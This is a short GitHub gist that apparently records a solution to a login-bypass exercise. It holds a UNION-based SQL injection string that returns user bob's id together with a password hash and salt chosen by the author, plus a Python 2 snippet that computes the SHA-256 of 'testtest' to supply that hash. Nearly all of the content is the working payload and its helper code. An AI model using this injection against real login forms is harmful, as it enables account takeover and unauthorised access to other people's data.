Created
August 23, 2012 20:58
-
-
Save timsegraves/3441654 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| So this should make the first part of the query in the code return nothing and it will be unioned with the second hand which should return bob's user id, my password_hash, and my salt value. | |
| ' UNION select id, '<USE VAL FROM PY BELOW>', 'test' from users where username='bob'; -- | |
| #!/usr/bin/env python | |
| import hashlib | |
| import json | |
| import logging | |
| import os | |
| import sqlite3 | |
| import subprocess | |
| import sys | |
| calculated_hash = hashlib.sha256('testtest') | |
| print calculated_hash.hexdigest() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment